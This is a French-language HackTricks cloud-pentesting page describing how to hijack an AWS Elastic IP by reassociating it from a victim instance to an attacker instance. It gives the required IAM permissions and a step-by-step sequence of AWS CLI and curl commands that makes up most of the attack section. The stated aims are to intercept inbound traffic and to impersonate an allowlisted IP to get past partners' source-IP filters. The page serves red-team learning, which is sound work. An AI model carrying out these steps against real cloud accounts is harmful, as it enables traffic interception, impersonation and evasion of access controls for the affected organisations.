AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

• Consultez les subscription plans!
• Rejoignez le 💬 Discord group ou le telegram group ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.

Résumé

Abuser de ec2:AssociateAddress (et éventuellement ec2:DisassociateAddress) pour réassocier un Elastic IP (EIP) depuis une instance/ENI victime vers une instance/ENI attaquante. Cela redirige le trafic entrant destiné à l’EIP vers l’attaquant et permet également à l’attaquant d’initier du trafic sortant avec l’IP publique allowlistée pour contourner les pare-feux des partenaires externes.

Prérequis

• Target EIP allocation ID in the same account/VPC.
• Instance/ENI de l’attaquant que vous contrôlez.
• Autorisations :
• ec2:DescribeAddresses
• ec2:AssociateAddress sur l’EIP allocation-id et sur l’instance/ENI de l’attaquant
• ec2:DisassociateAddress (optionnel). Remarque : --allow-reassociation désassociera automatiquement de l’attachement précédent.

Attaque

Variables

REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>

1. Allouer ou identifier l’EIP de la victime (le lab alloue un nouveau et l’attache à la victime)

ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)

2. Vérifier que l’EIP pointe actuellement vers le victim service (ex. vérification d’une banner)

curl -sS http://$EIP | grep -i victim

3. Réassocier l’EIP à l’attacker (se désassocie automatiquement de la victim)

aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION

4. Vérifiez que l’EIP se résout maintenant vers le attacker service

sleep 5; curl -sS http://$EIP | grep -i attacker

Preuve (association déplacée) :

aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text

Impact

• Inbound impersonation: Tout le trafic vers le hijacked EIP est acheminé vers l’instance/ENI de l’attacker.
• Outbound impersonation: Attacker peut initier du trafic qui semble provenir de l’allowlisted public IP (utile pour bypasser les partner/external source IP filters).

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

• Consultez les subscription plans!
• Rejoignez le 💬 Discord group ou le telegram group ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.